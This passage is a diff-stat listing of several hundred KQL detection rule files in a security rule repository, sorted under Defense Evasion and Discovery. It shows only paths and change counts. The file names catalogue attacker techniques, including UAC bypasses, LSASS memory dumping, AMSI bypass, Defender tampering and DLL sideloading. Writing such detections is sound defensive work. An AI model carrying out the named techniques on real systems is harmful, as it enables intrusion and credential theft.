18 ++++---- ...work_connection_initiated_by_cmstp_exe.kql | 20 ++++----- ...k_connection_to_public_ip_via_winlogon.kql | 22 +++++----- .../outgoing_logon_with_new_credentials.kql | 22 +++++----- ...rd_provided_in_command_line_of_net_exe.kql | 18 ++++---- .../pdf_file_created_by_regedit_exe.kql | 24 +++++----- KQL/rules/Defense Evasion/ping_hex_ip.kql | 22 +++++----- .../potential_7za_dll_sideloading.kql | 22 +++++----- .../potential_adplus_exe_abuse.kql | 22 +++++----- .../potential_amsi_bypass_using_null_bits.kql | 18 ++++---- ...tential_amsi_bypass_via_net_reflection.kql | 22 +++++----- .../potential_amsi_com_server_hijacking.kql | 18 ++++---- ...ial_antivirus_software_dll_sideloading.kql | 26 +++++------ ...cation_whitelisting_bypass_via_dnx_exe.kql | 24 +++++----- ..._arbitrary_code_execution_via_node_exe.kql | 22 +++++----- ...trary_command_execution_using_msdt_exe.kql | 18 ++++---- ...ntial_arbitrary_dll_load_using_winword.kql | 18 ++++---- ...file_download_using_office_application.kql | 18 ++++---- ...t_manager_settings_associations_tamper.kql | 22 +++++----- ...nt_manager_settings_attachments_tamper.kql | 22 +++++----- ...otential_autologger_sessions_tampering.kql | 18 ++++---- .../potential_base64_decoded_from_images.kql | 18 ++++---- ..._proxy_execution_via_vsdiagnostics_exe.kql | 22 +++++----- .../potential_ccleanerdu_dll_sideloading.kql | 22 +++++----- ...al_ccleanerreactivator_dll_sideloading.kql | 22 +++++----- ...al_chrome_frame_helper_dll_sideloading.kql | 18 ++++---- ...nd_line_path_traversal_evasion_attempt.kql | 24 +++++----- ...ne_obfuscation_using_escape_characters.kql | 18 ++++---- ...icode_characters_from_suspicious_image.kql | 20 ++++----- ...ealing_via_chromium_headless_debugging.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_1.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_2.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_3.kql | 18 ++++---- ...ivity_via_emoji_usage_in_commandline_4.kql | 18 ++++---- ...tial_defense_evasion_via_binary_rename.kql | 22 +++++----- ...via_rename_of_highly_relevant_binaries.kql | 24 +++++----- ...nse_evasion_via_right_to_left_override.kql | 24 +++++----- ...tential_dll_sideloading_of_dbgcore_dll.kql | 22 +++++----- ...tential_dll_sideloading_of_dbghelp_dll.kql | 22 +++++----- ...sideloading_of_libcurl_dll_via_gup_exe.kql | 18 ++++---- ..._sideloading_via_classicexplorer32_dll.kql | 18 ++++---- ...ntial_dll_sideloading_via_comctl32_dll.kql | 22 +++++----- ...potential_dll_sideloading_via_jsschhlp.kql | 18 ++++---- ...ded_powershell_patterns_in_commandline.kql | 18 ++++---- ...ntial_eventlog_file_location_tampering.kql | 18 ++++---- ...al_fake_instance_of_hxtsr_exe_executed.kql | 22 +++++----- ...d_via_ms_appinstaller_protocol_handler.kql | 20 ++++----- ...ation_via_ntfs_index_allocation_stream.kql | 22 +++++----- ...n_via_ntfs_index_allocation_stream_cli.kql | 22 +++++----- ...lyph_attack_using_lookalike_characters.kql | 26 +++++------ ...using_lookalike_characters_in_filename.kql | 26 +++++------ ...otential_lethalhta_technique_execution.kql | 18 ++++---- .../potential_libvlc_dll_sideloading.kql | 22 +++++----- ...ential_lsass_process_dump_via_procdump.kql | 30 ++++++------- ...anage_bde_wsf_abuse_to_proxy_execution.kql | 22 +++++----- ...ial_memory_dumping_activity_via_livekd.kql | 22 +++++----- ...tial_meterpreter_cobaltstrike_activity.kql | 24 +++++----- .../potential_mftrace_exe_abuse.kql | 22 +++++----- .../potential_msiexec_masquerading.kql | 18 ++++---- ...tential_ntlm_coercion_via_certutil_exe.kql | 18 ++++---- ...l_obfuscated_ordinal_call_via_rundll32.kql | 18 ++++---- ...word_spraying_attempt_using_dsacls_exe.kql | 22 +++++----- ..._pendingfilerenameoperations_tampering.kql | 22 +++++----- ...tial_persistence_via_outlook_home_page.kql | 20 ++++----- ...ial_persistence_via_outlook_today_page.kql | 20 ++++----- .../potential_powershell_downgrade_attack.kql | 18 ++++---- ..._powershell_execution_policy_tampering.kql | 18 ++++---- ...xecution_policy_tampering_proccreation.kql | 18 ++++---- ...potential_powershell_execution_via_dll.kql | 20 ++++----- ...hell_obfuscation_via_reversed_commands.kql | 22 +++++----- ...lation_attempt_via_exe_local_technique.kql | 18 ++++---- ..._execution_proxy_via_cl_invocation_ps1.kql | 18 ++++---- ...y_key_abuse_for_binary_proxy_execution.kql | 18 ++++---- ...y_abuse_for_binary_proxy_execution_reg.kql | 18 ++++---- ...aunch_exe_binary_proxy_execution_abuse.kql | 18 ++++---- ...thorized_mbr_tampering_via_bcdedit_exe.kql | 18 ++++---- ...ntial_register_app_vbs_lolscript_abuse.kql | 22 +++++----- ...tial_regsvr32_commandline_flag_anomaly.kql | 22 +++++----- ...dll32_execution_with_dll_stored_in_ads.kql | 18 ++++---- ...xy_execution_via_cl_mutexverifiers_ps1.kql | 18 ++++---- ..._bypass_via_windows_developer_features.kql | 18 ++++---- ...ia_windows_developer_features_registry.kql | 18 ++++---- ...potential_suspicious_mofcomp_execution.kql | 22 +++++----- ...s_windows_feature_enabled_proccreation.kql | 24 +++++----- ...otential_sysinternals_procdump_evasion.kql | 22 +++++----- ..._sideloading_from_non_system_locations.kql | 22 +++++----- ...pering_with_security_products_via_wmic.kql | 22 +++++----- ...azuh_security_platform_dll_sideloading.kql | 22 +++++----- ...t_reflectdebugger_registry_value_abuse.kql | 18 ++++---- ...indows_defender_tampering_via_wmic_exe.kql | 18 ++++---- .../potential_winnti_dropper_activity.kql | 18 ++++---- ...e_permissions_granted_using_dsacls_exe.kql | 22 +++++----- ...asp_net_compilation_via_aspnetcompiler.kql | 18 ++++---- ...ally_suspicious_cabinet_file_expansion.kql | 22 +++++----- ...ous_call_to_win32_nteventlogfile_class.kql | 18 ++++---- ...icious_child_process_of_diskshadow_exe.kql | 22 +++++----- ...y_suspicious_child_process_of_regsvr32.kql | 22 +++++----- ...ous_child_processes_spawned_by_conhost.kql | 22 +++++----- ...y_suspicious_cmd_shell_output_redirect.kql | 24 +++++----- ...icious_dll_registered_via_odbcconf_exe.kql | 22 +++++----- ...ally_suspicious_dmp_hdmp_file_creation.kql | 22 +++++----- ..._suspicious_event_viewer_child_process.kql | 18 ++++---- ...n_from_parent_process_in_public_folder.kql | 18 ++++---- ...y_suspicious_execution_from_tmp_folder.kql | 18 ++++---- ..._regasm_regsvcs_from_uncommon_location.kql | 18 ++++---- ...regasm_regsvcs_with_uncommon_extension.kql | 18 ++++---- ..._suspicious_googleupdate_child_process.kql | 18 ++++---- ...ocument_executed_from_trusted_location.kql | 18 ++++---- ...spicious_ping_copy_command_combination.kql | 18 ++++---- ...y_suspicious_regsvr32_http_ftp_pattern.kql | 18 ++++---- ...ly_suspicious_regsvr32_http_ip_pattern.kql | 22 +++++----- ...tentially_suspicious_rundll32_activity.kql | 22 +++++----- ...ous_rundll32_exe_execution_of_udl_file.kql | 24 +++++----- ...s_volume_shadow_copy_vsstrace_dll_load.kql | 18 ++++---- ...y_suspicious_wdac_policy_file_creation.kql | 22 +++++----- ...tially_suspicious_windows_app_activity.kql | 22 +++++----- ..._suspicious_wuauclt_network_connection.kql | 20 ++++----- ...base64_encoded_frombase64string_cmdlet.kql | 18 ++++---- ...ell_base64_encoded_mppreference_cmdlet.kql | 18 ++++---- ...owershell_console_history_logs_deleted.kql | 18 ++++---- ...core_dll_loaded_via_office_application.kql | 18 ++++---- ...wershell_defender_disable_scan_feature.kql | 24 +++++----- .../powershell_defender_exclusion.kql | 24 +++++----- ...fault_action_set_to_allow_or_noaction_.kql | 26 +++++------ ...executed_from_headless_conhost_process.kql | 20 ++++----- ...ng_disabled_via_registry_key_tampering.kql | 18 ++++---- ...l_script_change_permission_via_set_acl.kql | 18 ++++---- .../powershell_set_acl_on_windows_folder.kql | 18 ++++---- ...ell_token_obfuscation_process_creation.kql | 18 ++++---- .../Defense Evasion/prefetch_file_deleted.kql | 18 ++++---- .../Defense Evasion/procdump_execution.kql | 22 +++++----- ...ss_access_via_trolleyexpress_exclusion.kql | 18 ++++---- ...rocess_creation_using_sysnative_folder.kql | 18 ++++---- ...n_from_a_potentially_suspicious_folder.kql | 18 ++++---- .../process_launched_without_image_name.kql | 22 +++++----- .../process_memory_dump_via_comsvcs_dll.kql | 22 +++++----- .../process_memory_dump_via_dotnet_dump.kql | 22 +++++----- ...ocess_proxy_execution_via_squirrel_exe.kql | 22 +++++----- .../proxy_execution_via_vshadow.kql | 28 ++++++------ .../proxy_execution_via_wuauclt_exe.kql | 18 ++++---- ...olicytest_creation_by_uncommon_process.kql | 18 ++++---- .../pua_advancedrun_suspicious_execution.kql | 18 ++++---- .../pua_cleanwipe_execution.kql | 22 +++++----- .../pua_defendercheck_execution.kql | 22 +++++----- ...ential_pe_metadata_tamper_using_rcedit.kql | 22 +++++----- .../pua_process_hacker_execution.kql | 26 +++++------ ...nt_file_dropped_in_suspicious_location.kql | 22 +++++----- .../pubprn_vbs_proxy_execution.kql | 18 ++++---- ...ion_security_warning_disabled_in_excel.kql | 20 ++++----- ...ity_warning_disabled_in_excel_registry.kql | 20 ++++----- ...ython_image_load_by_non_python_process.kql | 30 ++++++------- .../Defense Evasion/raccine_uninstall.kql | 22 +++++----- .../rdp_connection_allowed_via_netsh_exe.kql | 22 +++++----- .../rdp_sensitive_settings_changed.kql | 24 +++++----- ...rdp_sensitive_settings_changed_to_zero.kql | 24 +++++----- ...ion_without_commandline_flags_or_files.kql | 24 +++++----- ...iating_network_connection_to_public_ip.kql | 18 ++++---- .../regedit_as_trusted_installer.kql | 22 +++++----- .../register_app_vbs_proxy_execution.kql | 22 +++++----- .../registry_entries_for_azorult_malware.kql | 18 ++++---- ...y_persistence_via_service_in_safe_mode.kql | 18 ++++---- ...ecution_with_suspicious_file_extension.kql | 22 +++++----- ...cution_from_highly_suspicious_location.kql | 22 +++++----- ...ion_from_potential_suspicious_location.kql | 22 +++++----- ..._rurat_execution_from_unusual_location.kql | 18 ++++---- ...chm_file_download_execution_via_hh_exe.kql | 18 ++++---- .../remote_code_execute_via_winrm_vbs.kql | 18 ++++---- .../remote_file_download_via_findstr_exe.kql | 18 ++++---- .../remote_xsl_execution_via_msxsl_exe.kql | 22 +++++----- ...ablement_abuse_via_atomictestharnesses.kql | 18 ++++---- ...hosted_hta_file_executed_via_mshta_exe.kql | 18 ++++---- ...removal_of_amsi_provider_registry_keys.kql | 22 +++++----- ...x_value_to_hide_schedule_task_registry.kql | 18 ++++---- ...d_value_to_hide_schedule_task_registry.kql | 18 ++++---- .../remove_immutable_file_attribute.kql | 22 +++++----- .../remove_scheduled_cron_task_job.kql | 20 ++++----- .../renamed_autohotkey_exe_execution.kql | 18 ++++---- .../renamed_boinc_client_execution.kql | 18 ++++---- .../renamed_createdump_utility_execution.kql | 22 +++++----- .../renamed_mavinject_exe_execution.kql | 22 +++++----- .../renamed_megasync_execution.kql | 24 +++++----- .../renamed_microsoft_teams_execution.kql | 18 ++++---- .../renamed_msdt_exe_execution.kql | 22 +++++----- .../renamed_office_binary_execution.kql | 18 ++++---- .../renamed_plink_execution.kql | 18 ++++---- .../renamed_procdump_execution.kql | 26 +++++------ ...d_remote_utilities_rat_rurat_execution.kql | 18 ++++---- ...sponse_file_execution_via_odbcconf_exe.kql | 22 +++++----- ...tificate_installed_from_susp_locations.kql | 22 +++++----- .../run_powershell_script_from_ads.kql | 18 ++++---- ...ll_script_from_redirected_input_stream.kql | 18 ++++---- ..._execution_with_uncommon_dll_extension.kql | 18 ++++---- ...ecution_without_commandline_parameters.kql | 22 +++++----- .../rundll32_installscreensaver_execution.kql | 22 +++++----- .../rundll32_internet_connection.kql | 22 +++++----- .../rundll32_spawned_via_explorer_exe.kql | 18 ++++---- .../rundll32_spawning_explorer.kql | 18 ++++---- .../rundll32_unc_path_execution.kql | 22 +++++----- .../runmru_registry_key_deletion.kql | 22 +++++----- .../runmru_registry_key_deletion_registry.kql | 22 +++++----- ...eboot_registry_key_deleted_via_reg_exe.kql | 22 +++++----- .../Defense Evasion/scr_file_write_event.kql | 22 +++++----- .../screensaver_registry_key_set.kql | 22 +++++----- ...ostics_turn_off_check_enabled_registry.kql | 22 +++++----- ...g_commandline_process_spawned_regsvr32.kql | 24 +++++----- .../Defense Evasion/sdclt_child_processes.kql | 18 ++++---- ...nhost_calling_suspicious_child_process.kql | 18 ++++---- .../security_service_disabled_via_reg_exe.kql | 22 +++++----- ...e_from_potentially_suspicious_location.kql | 24 +++++----- ...ted_in_potentially_suspicious_location.kql | 22 +++++----- ...rvice_registry_key_deleted_via_reg_exe.kql | 22 +++++----- ...files_as_system_files_using_attrib_exe.kql | 18 ++++---- .../Defense Evasion/setuid_and_setgid.kql | 22 +++++----- ...tion_using_operating_systems_utilities.kql | 24 +++++----- ..._dll_execution_in_suspicious_directory.kql | 18 ++++---- .../space_after_filename_macos.kql | 22 +++++----- .../start_of_nt_virtual_dos_machine.kql | 22 +++++----- .../suspect_svchost_activity.kql | 22 +++++----- ...spicious_advpack_call_via_rundll32_exe.kql | 22 +++++----- ...ous_agentexecutor_powershell_execution.kql | 18 ++++---- ...lication_allowed_through_exploit_guard.kql | 22 +++++----- ..._access_agent_update_utility_execution.kql | 20 ++++----- ...us_cabinet_file_execution_via_msdt_exe.kql | 22 +++++----- .../suspicious_calculator_usage.kql | 18 ++++---- ...icious_child_process_created_as_system.kql | 18 ++++---- ...icious_child_process_of_aspnetcompiler.kql | 18 ++++---- ...suspicious_child_process_of_wermgr_exe.kql | 18 ++++---- .../suspicious_codepage_switch_via_chcp.kql | 22 +++++----- .../suspicious_control_panel_dll_load.kql | 18 ++++---- ...cious_copy_from_or_to_system_directory.kql | 28 ++++++------ .../suspicious_creation_with_colorcpl.kql | 18 ++++---- .../suspicious_customshellhost_execution.kql | 22 +++++----- ...diantz_alternate_data_stream_execution.kql | 22 +++++----- .../suspicious_dll_loaded_via_certoc_exe.kql | 18 ++++---- .../suspicious_double_extension_files.kql | 22 +++++----- ..._download_from_direct_ip_via_bitsadmin.kql | 18 ++++---- ...rom_file_sharing_website_via_bitsadmin.kql | 22 +++++----- .../suspicious_download_via_certutil_exe.kql | 18 ++++---- ...iver_dll_installation_via_odbcconf_exe.kql | 22 +++++----- .../suspicious_dumpminitool_execution.kql | 18 ++++---- ...vironment_variable_has_been_registered.kql | 18 ++++---- ...aring_or_configuration_change_activity.kql | 28 ++++++------ .../suspicious_executable_file_creation.kql | 20 ++++----- ...s_execution_of_installutil_without_log.kql | 18 ++++---- ...trac32_alternate_data_stream_execution.kql | 18 ++++---- ...s_file_created_via_onenote_application.kql | 24 +++++----- ...le_creation_in_uncommon_appdata_folder.kql | 22 +++++----- ...loaded_from_direct_ip_via_certutil_exe.kql | 18 ++++---- ..._file_sharing_website_via_certutil_exe.kql | 18 ++++---- ...ile_encoded_to_base64_via_certutil_exe.kql | 18 ++++---- ...suspicious_files_in_default_gpo_folder.kql | 18 ++++---- .../suspicious_hh_exe_execution.kql | 18 ++++---- ...h_integritylevel_conhost_legacy_option.kql | 22 +++++----- ...iis_url_globalrules_rewrite_via_appcmd.kql | 22 +++++----- ...ous_javascript_execution_via_mshta_exe.kql | 18 ++++---- ...ious_lnk_double_extension_file_created.kql | 22 +++++----- ...picious_microsoft_office_child_process.kql | 18 ++++---- ...d_execution_by_uncommon_parent_process.kql | 18 ++++---- .../suspicious_msdt_parent_process.kql | 18 ++++---- .../suspicious_mshta_child_process.kql | 24 +++++----- .../suspicious_msiexec_embedding_parent.kql | 18 ++++---- ...spicious_msiexec_execute_arbitrary_dll.kql | 24 +++++----- ...xec_quiet_install_from_remote_location.kql | 18 ++++---- ...twork_connection_binary_no_commandline.kql | 18 ++++---- .../suspicious_obfuscated_powershell_code.kql | 18 ++++---- .../suspicious_package_installed_linux.kql | 22 +++++----- ...parent_double_extension_file_execution.kql | 18 ++++---- ...eyboard_layout_ime_file_registry_value.kql | 22 +++++----- ...uspicious_ping_del_command_combination.kql | 18 ++++---- ...xecution_to_change_lock_screen_timeout.kql | 18 ++++---- ...l_invocations_specific_processcreation.kql | 18 ++++---- ...us_process_masquerading_as_svchost_exe.kql | 24 +++++----- .../suspicious_process_parents.kql | 18 ++++---- .../suspicious_process_start_locations.kql | 22 +++++----- ..._via_werfaultsecure_through_edr_freeze.kql | 22 +++++----- ...ous_procexp152_sys_file_created_in_tmp.kql | 24 +++++----- ..._whitelisted_in_firewall_via_netsh_exe.kql | 18 ++++---- ...uspicious_provlaunch_exe_child_process.kql | 18 ++++---- .../suspicious_rasdial_activity.kql | 22 +++++----- .../suspicious_recursive_takeown.kql | 24 +++++----- ...s_regsvr32_execution_from_remote_share.kql | 18 ++++---- ...sponse_file_execution_via_odbcconf_exe.kql | 22 +++++----- ...us_rundll32_activity_invoking_sys_file.kql | 18 ++++---- ...undll32_execution_with_image_extension.kql | 18 ++++---- ...picious_rundll32_setupapi_dll_activity.kql | 22 +++++----- .../suspicious_service_binary_directory.kql | 18 ++++---- .../suspicious_service_installed.kql | 24 +++++----- ...ious_shellexec_rundll_call_via_ordinal.kql | 20 ++++----- ...us_speech_runtime_binary_child_process.kql | 24 +++++----- .../suspicious_splwow64_without_params.kql | 18 ++++---- ...indows_defender_feature_via_powershell.kql | 18 ++++---- .../suspicious_usage_of_shellexec_rundll.kql | 18 ++++---- ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 22 +++++----- ...ous_volume_shadow_copy_vssapi_dll_load.kql | 18 ++++---- ...t_command_with_agentextensionpath_load.kql | 22 +++++----- ...der_folder_exclusion_added_via_reg_exe.kql | 22 +++++----- ...der_registry_key_tampering_via_reg_exe.kql | 22 +++++----- .../suspicious_windows_service_tampering.kql | 22 +++++----- ...race_etw_session_tamper_via_logman_exe.kql | 24 +++++----- ...ous_windows_update_agent_empty_cmdline.kql | 18 ++++---- ...uspicious_wordpad_outbound_connections.kql | 24 +++++----- ...cious_workstation_locking_via_rundll32.kql | 22 +++++----- ...icious_x509enrollment_process_creation.kql | 22 +++++----- ...picious_xor_encoded_powershell_command.kql | 18 ++++---- ...rver_execute_arbitrary_powershell_code.kql | 22 +++++----- ..._vbs_execute_arbitrary_powershell_code.kql | 18 ++++---- ...ternals_pssuspend_suspicious_execution.kql | 22 +++++----- ...earing_or_removal_via_system_utilities.kql | 24 +++++----- .../sysmon_configuration_update.kql | 22 +++++----- .../sysmon_driver_altitude_change.kql | 24 +++++----- .../sysmon_driver_unloaded_via_fltmc_exe.kql | 22 +++++----- ...nel_item_loaded_from_uncommon_location.kql | 18 ++++---- ...system_file_execution_location_anomaly.kql | 18 ++++---- ...information_discovery_via_sysctl_macos.kql | 24 +++++----- ...r_windows_defender_remove_mppreference.kql | 22 +++++----- .../tamper_with_sophos_av_registry_keys.kql | 22 +++++----- .../taskkill_symantec_endpoint_protection.kql | 22 +++++----- .../taskmgr_as_local_system.kql | 18 ++++---- .../teamviewer_log_file_deleted.kql | 18 ++++---- .../third_party_software_dll_sideloading.kql | 18 ++++---- .../time_travel_debugging_utility_usage.kql | 22 +++++----- ...e_travel_debugging_utility_usage_image.kql | 22 +++++----- .../tomcat_webserver_logs_deleted.kql | 24 +++++----- .../touch_suspicious_service_file.kql | 22 +++++----- ...le_cross_ebpf_rootkit_default_lockfile.kql | 22 +++++----- ...riple_cross_ebpf_rootkit_execve_hijack.kql | 22 +++++----- ...le_cross_ebpf_rootkit_install_commands.kql | 22 +++++----- ...ypass_abusing_winsat_path_parsing_file.kql | 18 ++++---- ...ss_abusing_winsat_path_parsing_process.kql | 18 ++++---- ...s_abusing_winsat_path_parsing_registry.kql | 18 ++++---- ...ac_bypass_tools_using_computerdefaults.kql | 18 ++++---- .../uac_bypass_using_changepk_and_slui.kql | 18 ++++---- ...bypass_using_consent_and_comctl32_file.kql | 18 ++++---- ...ass_using_consent_and_comctl32_process.kql | 18 ++++---- .../uac_bypass_using_disk_cleanup.kql | 18 ++++---- .../uac_bypass_using_dismhost.kql | 18 ++++---- ..._bypass_using_event_viewer_recentviews.kql | 18 ++++---- .../uac_bypass_using_eventvwr.kql | 18 ++++---- .../uac_bypass_using_ieinstal_file.kql | 18 ++++---- .../uac_bypass_using_ieinstal_process.kql | 18 ++++---- .../uac_bypass_using_iscsicpl_imageload.kql | 18 ++++---- ...using_msconfig_token_modification_file.kql | 18 ++++---- ...ng_msconfig_token_modification_process.kql | 18 ++++---- ..._bypass_using_net_code_profiler_on_mmc.kql | 18 ++++---- ...c_bypass_using_ntfs_reparse_point_file.kql | 18 ++++---- ...ypass_using_ntfs_reparse_point_process.kql | 18 ++++---- .../uac_bypass_using_pkgmgr_and_dism.kql | 18 ++++---- ...bypass_using_windows_media_player_file.kql | 18 ++++---- ...ass_using_windows_media_player_process.kql | 18 ++++---- ...ss_using_windows_media_player_registry.kql | 18 ++++---- .../uac_bypass_via_event_viewer.kql | 18 ++++---- .../uac_bypass_via_icmluautil.kql | 18 ++++---- .../Defense Evasion/uac_bypass_via_sdclt.kql | 18 ++++---- ...ss_via_windows_firewall_snap_in_hijack.kql | 18 ++++---- .../uac_bypass_via_wsreset.kql | 18 ++++---- .../Defense Evasion/uac_bypass_wsreset.kql | 18 ++++---- .../ufw_force_stop_using_ufw_init.kql | 22 +++++----- ...on_addinutil_exe_commandline_execution.kql | 18 ++++---- ...pplications_execution_via_atbroker_exe.kql | 22 +++++----- ...ncommon_child_process_of_addinutil_exe.kql | 18 ++++---- .../uncommon_child_process_of_appvlp_exe.kql | 24 +++++----- ...ommon_child_process_of_defaultpack_exe.kql | 18 ++++---- .../uncommon_child_process_of_setres_exe.kql | 26 +++++------ ..._child_process_spawned_by_odbcconf_exe.kql | 24 +++++----- ...eyboard_layout_ime_file_registry_value.kql | 26 +++++------ ..._file_creation_by_mysql_daemon_process.kql | 20 ++++----- ..._filesystem_load_attempt_by_format_com.kql | 18 ++++---- .../uncommon_link_exe_parent_process.kql | 26 +++++------ .../uncommon_outbound_kerberos_connection.kql | 22 +++++----- .../uncommon_sigverif_exe_child_process.kql | 18 ++++---- .../uncommon_svchost_parent_process.kql | 18 ++++---- .../uninstall_crowdstrike_falcon_sensor.kql | 22 +++++----- .../uninstall_sysinternals_sysmon.kql | 22 +++++----- .../unmount_share_via_net_exe.kql | 22 +++++----- .../use_icacls_to_hide_file_to_everyone.kql | 18 ++++---- .../use_ntfs_short_name_in_command_line.kql | 22 +++++----- .../use_ntfs_short_name_in_image.kql | 22 +++++----- .../Defense Evasion/use_of_remote_exe.kql | 22 +++++----- .../use_of_scriptrunner_exe.kql | 22 +++++----- ...use_of_the_sftp_exe_binary_as_a_lolbin.kql | 18 ++++---- .../Defense Evasion/use_of_ttdinject_exe.kql | 22 +++++----- .../use_of_visualuiaverifynative_exe.kql | 22 +++++----- .../use_of_vsiisexelauncher_exe.kql | 18 ++++---- KQL/rules/Defense Evasion/use_of_wfc_exe.kql | 22 +++++----- .../use_short_name_path_in_image.kql | 22 +++++----- .../utilityfunctions_ps1_proxy_dll.kql | 18 ++++---- .../verclsid_exe_runs_com_object.kql | 18 ++++---- ...driver_installation_or_starting_of_vms.kql | 22 +++++----- ...sual_basic_command_line_compiler_usage.kql | 22 +++++----- ...ab_execution_from_non_default_location.kql | 18 ++++---- ...bmig_unusual_parent_or_child_processes.kql | 18 ++++---- .../weak_or_abused_passwords_in_cli.kql | 26 +++++------ .../wfp_filter_added_via_registry.kql | 18 ++++---- ...s_binaries_write_suspicious_extensions.kql | 18 ++++---- .../windows_defender_context_menu_removed.kql | 26 +++++------ ...dows_defender_definition_files_removed.kql | 18 ++++---- ...ndows_defender_exclusion_list_modified.kql | 22 +++++----- ...ows_defender_exclusions_added_registry.kql | 22 +++++----- ...ows_defender_service_disabled_registry.kql | 22 +++++----- ...hreat_severity_default_action_modified.kql | 28 ++++++------ ...ndows_firewall_disabled_via_powershell.kql | 18 ++++---- .../windows_kernel_debugger_execution.kql | 22 +++++----- ..._processes_suspicious_parent_directory.kql | 22 +++++----- .../winget_admin_settings_modification.kql | 22 +++++----- ...exe_uncommon_argument_or_child_process.kql | 20 ++++----- .../wmic_loading_scripting_libraries.kql | 26 +++++------ .../write_protect_for_storage_disabled.kql | 20 ++++----- ...of_malicious_files_to_the_fonts_folder.kql | 18 ++++---- .../Defense Evasion/wsl_kali_linux_usage.kql | 22 +++++----- ...mon_locations_via_presentationhost_exe.kql | 22 +++++----- .../xsl_script_execution_via_wmic_exe.kql | 28 ++++++------ ...ctory_database_snapshot_via_adexplorer.kql | 18 ++++---- ...ing_complete_ad_snapshot_into_dat_file.kql | 22 +++++----- .../advanced_ip_scanner_file_event.kql | 22 +++++----- ..._monitoring_agent_registry_keys_access.kql | 20 ++++----- ...th_service_agents_registry_keys_access.kql | 24 +++++----- .../Discovery/bloodhound_collection_files.kql | 22 +++++----- .../capabilities_discovery_linux.kql | 18 ++++---- ...y_and_export_via_get_adcomputer_cmdlet.kql | 22 +++++----- ...ter_system_reconnaissance_via_wmic_exe.kql | 18 ++++---- .../console_codepage_lookup_via_chcp.kql | 24 +++++----- ...esidence_discovery_via_proc_virtual_fs.kql | 24 +++++----- KQL/rules/Discovery/crontab_enumeration.kql | 22 +++++----- .../detected_windows_software_discovery.kql | 22 +++++----- KQL/rules/Discovery/dirlister_execution.kql | 22 +++++----- .../Discovery/discovery_of_a_system_time.kql | 22 +++++----- ...tainer_discovery_via_dockerenv_listing.kql | 24 +++++----- .../domain_trust_discovery_via_dsquery.kql | 22 +++++----- .../Discovery/driverquery_exe_execution.kql | 22 +++++----- ...merate_all_information_with_whoami_exe.kql | 18 ++++---- ...ork_configuration_discovery_via_esxcli.kql | 22 +++++----- ...orage_information_discovery_via_esxcli.kql | 22 +++++----- ...ystem_information_discovery_via_esxcli.kql | 22 +++++----- .../esxi_vm_list_discovery_via_esxcli.kql | 22 +++++----- ..._vsan_information_discovery_via_esxcli.kql | 22 +++++----- .../file_and_directory_discovery_linux.kql | 22 +++++----- .../file_and_directory_discovery_macos.kql | 22 +++++----- ..._subfolder_enumeration_via_dir_command.kql | 22 +++++----- ...ing_explorer_folder_shortcut_via_shell.kql | 18 ++++---- ..._configuration_discovery_via_netsh_exe.kql | 22 +++++----- .../Discovery/fsutil_drive_enumeration.kql | 22 +++++----- ...kinfo_vbs_reconnaissance_script_output.kql | 18 ++++---- ...esult_display_group_policy_information.kql | 18 ++++---- ...mbership_reconnaissance_via_whoami_exe.kql | 18 ++++---- ...cktool_bloodhound_sharphound_execution.kql | 22 +++++----- .../Discovery/hacktool_certify_execution.kql | 18 ++++---- .../Discovery/hacktool_certipy_execution.kql | 22 +++++----- .../hacktool_sharpldapmonitor_execution.kql | 18 ++++---- .../hacktool_sharpldapwhoami_execution.kql | 22 +++++----- .../hacktool_sharpview_execution.kql | 18 ++++---- .../hacktool_soaphound_execution.kql | 18 ++++---- .../hacktool_trufflesnout_execution.kql | 18 ++++---- ...ting_of_wifi_credentials_via_netsh_exe.kql | 18 ++++---- ...twork_service_scanning_tools_execution.kql | 22 +++++----- .../linux_remote_system_discovery.kql | 22 +++++----- .../Discovery/local_accounts_discovery.kql | 22 +++++----- .../local_groups_discovery_linux.kql | 22 +++++----- .../local_groups_discovery_macos.kql | 22 +++++----- ...cal_groups_reconnaissance_via_wmic_exe.kql | 24 +++++----- .../local_system_accounts_discovery_linux.kql | 22 +++++----- .../local_system_accounts_discovery_macos.kql | 22 +++++----- .../macos_network_service_scanning.kql | 22 +++++----- .../macos_remote_system_discovery.kql | 22 +++++----- .../network_reconnaissance_activity.kql | 22 +++++----- .../Discovery/network_sniffing_macos.kql | 24 +++++----- ...rk_trace_capture_started_via_netsh_exe.kql | 22 +++++----- KQL/rules/Discovery/nltest_exe_execution.kql | 22 +++++----- .../notepad_password_files_discovery.kql | 22 +++++----- .../obfuscated_ip_download_activity.kql | 18 ++++---- KQL/rules/Discovery/obfuscated_ip_via_cli.kql | 18 ++++---- .../os_architecture_discovery_via_grep.kql | 18 ++++---- .../permission_check_via_accesschk_exe.kql | 22 +++++----- KQL/rules/Discovery/pktmon_exe_execution.kql | 22 +++++----- ...scan_binary_data_transmission_activity.kql | 20 ++++----- ...and_service_reconnaissance_via_reg_exe.kql | 22 +++++----- ...container_discovery_via_inodes_listing.kql | 24 +++++----- ...al_discovery_activity_using_find_linux.kql | 18 ++++---- ...al_discovery_activity_using_find_macos.kql | 18 ++++---- ...tial_discovery_activity_via_dnscmd_exe.kql | 22 +++++----- ...tential_gobrat_file_discovery_via_grep.kql | 18 ++++---- ...l_recon_activity_using_driverquery_exe.kql | 22 +++++----- ...otential_recon_activity_via_nltest_exe.kql | 22 +++++----- ...nce_activity_via_gathernetworkinfo_vbs.kql | 22 +++++----- .../pua_adfind_suspicious_execution.kql | 22 +++++----- .../Discovery/pua_adidnsdump_execution.kql | 20 ++++----- .../pua_advanced_ip_scanner_execution.kql | 22 +++++----- .../pua_advanced_port_scanner_execution.kql | 24 +++++----- KQL/rules/Discovery/pua_crassus_execution.kql | 22 +++++----- .../Discovery/pua_nmap_zenmap_execution.kql | 22 +++++----- .../Discovery/pua_seatbelt_execution.kql | 22 +++++----- .../pua_softperfect_netscan_execution.kql | 24 +++++----- ...vedirectory_enumeration_via_adfind_exe.kql | 22 +++++----- .../Discovery/pua_trufflehog_execution.kql | 26 +++++------ .../pua_trufflehog_execution_linux.kql | 26 +++++------ .../Discovery/python_initiated_connection.kql | 22 +++++----- ...on_command_output_piped_to_findstr_exe.kql | 20 ++++----- .../Discovery/renamed_whoami_execution.kql | 18 ++++---- .../sam_registry_hive_handle_request.kql | 18 ++++---- .../security_software_discovery_linux.kql | 22 +++++----- .../security_software_discovery_macos.kql | 22 +++++----- 